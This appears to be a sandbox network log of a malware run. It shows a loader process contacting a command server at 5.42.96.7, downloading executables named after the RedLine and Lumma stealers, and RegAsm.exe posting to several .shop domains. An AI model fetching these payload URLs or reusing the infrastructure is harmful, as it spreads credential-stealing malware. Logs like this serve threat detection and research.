access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 709109B465CF40C78566FC0511256FE4 Ref B: LON04EDGE0607 Ref C: 2024-05-13T09:50:40Z
date: Mon, 13 May 2024 09:50:39 GMT
GET

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8tz-vpQe9h7-ulKDwWBJ2qjVUCUxpeaBe7BF6tj6WmNu6xvJvvxYlkqnAnlPFh-Fve48pza2XAkT8R2x9MoaVexV-RXI5kjSoCAtDOMCrp6pOriB5rP-1LBsvU4WMriN18XavVWkR26ukRhjnecSWEguKpmaEBbR7LM3dE1WfI4jZlcEa%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D6f2c850fe4ba1225cc76e3244f72112d&TIME=20240426T132839Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189&muid=DA7A91E17E56FC56DF5DE341A69C2E55

Remote address:

204.79.197.237:443

Request

GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8tz-vpQe9h7-ulKDwWBJ2qjVUCUxpeaBe7BF6tj6WmNu6xvJvvxYlkqnAnlPFh-Fve48pza2XAkT8R2x9MoaVexV-RXI5kjSoCAtDOMCrp6pOriB5rP-1LBsvU4WMriN18XavVWkR26ukRhjnecSWEguKpmaEBbR7LM3dE1WfI4jZlcEa%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D6f2c850fe4ba1225cc76e3244f72112d&TIME=20240426T132839Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189&muid=DA7A91E17E56FC56DF5DE341A69C2E55 HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=0F77A228E69F680F1D58B656E7B86947; _EDGE_S=SID=1487D344BDF568023706C73ABC996970

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=eVpXVTSZsfAjdYnmTAsJ7ek5xI6vDgVqI9uObYoMM1w; domain=.bing.com; expires=Sat, 07-Jun-2025 09:50:41 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: B339CA2ECAB44A9DAF475DC35F20997E Ref B: LON04EDGE0607 Ref C: 2024-05-13T09:50:41Z
date: Mon, 13 May 2024 09:50:41 GMT
DNS

183.142.211.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

183.142.211.20.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
GET

https://www.bing.com/aes/c.gif?RG=fe0be837c9d846bd9e38dd6aa7f278f8&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T132839Z&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189

Remote address:

23.62.61.72:443

Request

GET /aes/c.gif?RG=fe0be837c9d846bd9e38dd6aa7f278f8&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T132839Z&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189 HTTP/2.0
host: www.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=0F77A228E69F680F1D58B656E7B86947

Response

HTTP/2.0 200

cache-control: private,no-store
pragma: no-cache
vary: Origin
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 36AE6FE1CB1840DA8F5DA45C7E51FCD7 Ref B: BRU30EDGE0516 Ref C: 2024-05-13T09:50:41Z
content-length: 0
date: Mon, 13 May 2024 09:50:41 GMT
set-cookie: _EDGE_S=SID=1487D344BDF568023706C73ABC996970; path=/; httponly; domain=bing.com
set-cookie: MUIDB=0F77A228E69F680F1D58B656E7B86947; path=/; httponly; expires=Sat, 07-Jun-2025 09:50:41 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.443d3e17.1715593841.1080ec2
DNS

237.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

237.197.79.204.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

73.31.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

73.31.126.40.in-addr.arpa

IN PTR

Response
POST

http://5.42.96.7/zamo7h/index.php

axplons.exe

Remote address:

5.42.96.7:80

Request

POST /zamo7h/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.7
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:50:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://5.42.96.7/zamo7h/index.php

axplons.exe

Remote address:

5.42.96.7:80

Request

POST /zamo7h/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.7
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:50:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://5.42.96.7/lend/alex.exe

axplons.exe

Remote address:

5.42.96.7:80

Request

GET /lend/alex.exe HTTP/1.1
Host: 5.42.96.7

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:50:42 GMT
Content-Type: application/octet-stream
Content-Length: 2831872
Last-Modified: Sat, 11 May 2024 20:05:26 GMT
Connection: keep-alive
ETag: "663fcf86-2b3600"
Accept-Ranges: bytes
POST

http://5.42.96.7/zamo7h/index.php

axplons.exe

Remote address:

5.42.96.7:80

Request

POST /zamo7h/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.7
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:50:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://5.42.96.7/lend/gold.exe

axplons.exe

Remote address:

5.42.96.7:80

Request

GET /lend/gold.exe HTTP/1.1
Host: 5.42.96.7

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:50:45 GMT
Content-Type: application/octet-stream
Content-Length: 412448
Last-Modified: Sat, 11 May 2024 20:05:30 GMT
Connection: keep-alive
ETag: "663fcf8a-64b20"
Accept-Ranges: bytes
POST

http://5.42.96.7/zamo7h/index.php

axplons.exe

Remote address:

5.42.96.7:80

Request

POST /zamo7h/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.7
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:50:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://5.42.96.7/lend/redline1.exe

axplons.exe

Remote address:

5.42.96.7:80

Request

GET /lend/redline1.exe HTTP/1.1
Host: 5.42.96.7

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:50:46 GMT
Content-Type: application/octet-stream
Content-Length: 311296
Last-Modified: Sat, 11 May 2024 20:05:37 GMT
Connection: keep-alive
ETag: "663fcf91-4c000"
Accept-Ranges: bytes
POST

http://5.42.96.7/zamo7h/index.php

axplons.exe

Remote address:

5.42.96.7:80

Request

POST /zamo7h/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.7
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:50:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://5.42.96.7/zamo7h/index.php

axplons.exe

Remote address:

5.42.96.7:80

Request

POST /zamo7h/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.7
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:50:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://5.42.96.7/lend/swizzhis.exe

axplons.exe

Remote address:

5.42.96.7:80

Request

GET /lend/swizzhis.exe HTTP/1.1
Host: 5.42.96.7

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:50:50 GMT
Content-Type: application/octet-stream
Content-Length: 1084416
Last-Modified: Sat, 11 May 2024 20:43:13 GMT
Connection: keep-alive
ETag: "663fd861-108c00"
Accept-Ranges: bytes
POST

http://5.42.96.7/zamo7h/index.php

axplons.exe

Remote address:

5.42.96.7:80

Request

POST /zamo7h/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.7
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:50:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://5.42.96.7/lend/lumma1.exe

axplons.exe

Remote address:

5.42.96.7:80

Request

GET /lend/lumma1.exe HTTP/1.1
Host: 5.42.96.7

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:50:52 GMT
Content-Type: application/octet-stream
Content-Length: 1274880
Last-Modified: Sat, 11 May 2024 20:48:32 GMT
Connection: keep-alive
ETag: "663fd9a0-137400"
Accept-Ranges: bytes
POST

http://5.42.96.7/zamo7h/index.php

axplons.exe

Remote address:

5.42.96.7:80

Request

POST /zamo7h/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.7
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:50:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://5.42.96.7/zamo7h/index.php

axplons.exe

Remote address:

5.42.96.7:80

Request

POST /zamo7h/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.7
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:50:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://5.42.96.7/zamo7h/index.php

axplons.exe

Remote address:

5.42.96.7:80

Request

POST /zamo7h/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.7
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:51:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://5.42.96.7/lend/taskmgr.exe

axplons.exe

Remote address:

5.42.96.7:80

Request

GET /lend/taskmgr.exe HTTP/1.1
Host: 5.42.96.7

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:51:00 GMT
Content-Type: application/octet-stream
Content-Length: 203776
Last-Modified: Mon, 13 May 2024 01:36:09 GMT
Connection: keep-alive
ETag: "66416e89-31c00"
Accept-Ranges: bytes
POST

http://5.42.96.7/zamo7h/index.php

axplons.exe

Remote address:

5.42.96.7:80

Request

POST /zamo7h/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.7
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:51:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

Remote address:

23.62.61.72:443

Request

GET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
host: www.bing.com
accept: */*
cookie: MUID=0F77A228E69F680F1D58B656E7B86947; _EDGE_S=SID=1487D344BDF568023706C73ABC996970; MSPTC=eVpXVTSZsfAjdYnmTAsJ7ek5xI6vDgVqI9uObYoMM1w; MUIDB=0F77A228E69F680F1D58B656E7B86947
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1107
date: Mon, 13 May 2024 09:50:42 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.443d3e17.1715593842.10812bd
DNS

72.61.62.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

72.61.62.23.in-addr.arpa

IN PTR

Response

72.61.62.23.in-addr.arpa

IN PTR

a23-62-61-72deploystaticakamaitechnologiescom
DNS

43.58.199.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.58.199.20.in-addr.arpa

IN PTR

Response
DNS

7.96.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

7.96.42.5.in-addr.arpa

IN PTR

Response
DNS

zippyfinickysofwps.shop

RegAsm.exe

Remote address:

8.8.8.8:53

Request

zippyfinickysofwps.shop

IN A

Response

zippyfinickysofwps.shop

IN A

104.21.39.216

zippyfinickysofwps.shop

IN A

172.67.148.231
POST

https://zippyfinickysofwps.shop/api

RegAsm.exe

Remote address:

104.21.39.216:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: zippyfinickysofwps.shop

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:50:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=eiu4mhcgumoqpl9g0v2m48sq8e; expires=Fri, 06-Sep-2024 03:37:26 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KnI2559wv%2BypsBfvA2c06n%2FQLNlWZKiu5B0nxS%2FVhKmPZDIItHsroEczjj%2B2cQ5LY5x%2FmsjcDfvWlMm2uI1fKmX1vu8Z11agAVGedBbHwimojXtDPMs1CMvFz2hXpYtKGCesEaTece6ZDg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bf0a6b366550-LHR
alt-svc: h3=":443"; ma=86400
POST

https://zippyfinickysofwps.shop/api

RegAsm.exe

Remote address:

104.21.39.216:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: zippyfinickysofwps.shop

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:50:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=5e6l6htg2l8n1uqf73p84pon09; expires=Fri, 06-Sep-2024 03:37:27 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hxfa5QXoA2Jzvb%2BzOJrC1aPmNvauto7dNSN5Jn0QQMS9nQ1HCLDK9qVl4EaqhHAUM5FacNYLNyPDmY4nrYupQRu1ofxUuKzc5XSMt2l7xJ1fgJYtxFPlzWq2KVZnrNKM4df1AzNGAf9sUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bf126d626550-LHR
alt-svc: h3=":443"; ma=86400
DNS

acceptabledcooeprs.shop

RegAsm.exe

Remote address:

8.8.8.8:53

Request

acceptabledcooeprs.shop

IN A

Response

acceptabledcooeprs.shop

IN A

172.67.180.137

acceptabledcooeprs.shop

IN A

104.21.59.156
POST

https://acceptabledcooeprs.shop/api

RegAsm.exe

Remote address:

172.67.180.137:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: acceptabledcooeprs.shop

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:50:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=lfahl8b17nuimqsj0tur9ei7sq; expires=Fri, 06-Sep-2024 03:37:27 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WFrUl1g439Fh1nyY6shwi%2FD8MzyVjtpz2tnRyeKAyrqvCBdIi07FJDyqtsMcgQJHWPoNk8Y1M4MKR7cYh7TP%2FPJrRyvfIeMB9s6og7KarqY99QVdPpGXd7EN74ibdbMO6gx7XFkTkdlxXw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bf0de8ed60ff-LHR
alt-svc: h3=":443"; ma=86400
DNS

216.39.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

216.39.21.104.in-addr.arpa

IN PTR

Response
DNS

137.180.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

137.180.67.172.in-addr.arpa

IN PTR

Response
DNS

33.128.172.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

33.128.172.185.in-addr.arpa

IN PTR

Response
GET

http://77.221.151.47/install.exe

axplons.exe

Remote address:

77.221.151.47:80

Request

GET /install.exe HTTP/1.1
Host: 77.221.151.47

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Mon, 13 May 2024 09:50:48 GMT
Content-Type: application/octet-stream
Content-Length: 4448942
Last-Modified: Thu, 02 May 2024 13:52:07 GMT
Connection: keep-alive
ETag: "66339a87-43e2ae"
Accept-Ranges: bytes
DNS

obsceneclassyjuwks.shop

RegAsm.exe

Remote address:

8.8.8.8:53

Request

obsceneclassyjuwks.shop

IN A

Response

obsceneclassyjuwks.shop

IN A

188.114.96.2

obsceneclassyjuwks.shop

IN A

188.114.97.2
POST

https://obsceneclassyjuwks.shop/api

RegAsm.exe

Remote address:

188.114.96.2:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: obsceneclassyjuwks.shop

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:50:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=lq07se9kdg0hdqugogtf6jfvil; expires=Fri, 06-Sep-2024 03:37:27 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0WFbSDWWhukdw7a%2BFAvfxXWCxGMV1onrZzd6U4QMj9sQvVfHvYfT3gQHEHiiy2SvIuhvDSLqssrMFU3wg3WH9fo2nrH3iIYoJwiblRHxA1qBmdnSeSavIal7HbF56H%2B0tJWZBMLZZkAp6Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bf10ef90731e-LHR
alt-svc: h3=":443"; ma=86400
DNS

miniaturefinerninewjs.shop

RegAsm.exe

Remote address:

8.8.8.8:53

Request

miniaturefinerninewjs.shop

IN A

Response

miniaturefinerninewjs.shop

IN A

104.21.30.191

miniaturefinerninewjs.shop

IN A

172.67.173.139
POST

https://miniaturefinerninewjs.shop/api

RegAsm.exe

Remote address:

104.21.30.191:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: miniaturefinerninewjs.shop

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:50:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=92eba3b6fai3nrblgdjms7qagp; expires=Fri, 06-Sep-2024 03:37:28 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P5gNgPraseaFDM6l6n%2BSX%2BHXOZza4ucoiGRScmHJSF2tIR8udzDQwLG6cIqPVrugg2%2FvXXeLMYWVeURXZ3Eul7pZ0iO5xJNAjyutWNarzW2QyNsiQtEdkYrPvJ8fHscMkpnxLbwutfC%2FpRLd8w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bf14ce087300-LHR
alt-svc: h3=":443"; ma=86400
DNS

47.151.221.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

47.151.221.77.in-addr.arpa

IN PTR

Response
DNS

67.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

67.113.215.185.in-addr.arpa

IN PTR

Response
DNS

2.96.114.188.in-addr.arpa

Remote address:

8.8.8.8:53

Request

2.96.114.188.in-addr.arpa

IN PTR

Response
DNS

plaintediousidowsko.shop

RegAsm.exe

Remote address:

8.8.8.8:53

Request

plaintediousidowsko.shop

IN A

Response

plaintediousidowsko.shop

IN A

172.67.213.139

plaintediousidowsko.shop

IN A

104.21.53.146
POST

https://plaintediousidowsko.shop/api

RegAsm.exe

Remote address:

172.67.213.139:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: plaintediousidowsko.shop

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:50:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=te4b21mumvm6iuetqa4mvm0chl; expires=Fri, 06-Sep-2024 03:37:28 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y0eLutuse2DLLyVJQhDeMCg%2F1ORYVzXhKGDcrJBjnb55UYCzrKqQjTZrIakf5wpmzJr%2FFlf3mOJLT7IIbJc4D9OaR9F%2FijYvPz1zIzWYKt8bADTTz4iWk9QVH7886jAxRWnLLBV07aAVZMk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bf176d9088bb-LHR
alt-svc: h3=":443"; ma=86400
DNS

sweetsquarediaslw.shop

RegAsm.exe

Remote address:

8.8.8.8:53

Request

sweetsquarediaslw.shop

IN A

Response

sweetsquarediaslw.shop

IN A

104.21.44.201

sweetsquarediaslw.shop

IN A

172.67.203.170
POST

https://sweetsquarediaslw.shop/api

RegAsm.exe

Remote address:

104.21.44.201:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: sweetsquarediaslw.shop

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:50:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=7gr3r7kc6e8r0mtcmuarv29hqk; expires=Fri, 06-Sep-2024 03:37:29 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F0D9rm9vXJTdDF9yc6spzmtCr8ogk%2ByitRdQB7Isyp6TuMslz3foeaIBPSd%2FYF6HstqY%2Fo%2FhBJOUry7xZeaGhVreex3ePiO7W9cZKtbrvr08J02pC%2FwpyxF76xvAsX6k7y%2BspTNtu92c"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bf1a3d03888b-LHR
alt-svc: h3=":443"; ma=86400
DNS

191.30.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

191.30.21.104.in-addr.arpa

IN PTR

Response
DNS

139.213.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

139.213.67.172.in-addr.arpa

IN PTR

Response
DNS

201.44.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

201.44.21.104.in-addr.arpa

IN PTR

Response
DNS

holicisticscrarws.shop

RegAsm.exe

Remote address:

8.8.8.8:53

Request

holicisticscrarws.shop

IN A

Response

holicisticscrarws.shop

IN A

104.21.40.92

holicisticscrarws.shop

IN A

172.67.183.72
POST

https://holicisticscrarws.shop/api

RegAsm.exe

Remote address:

104.21.40.92:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
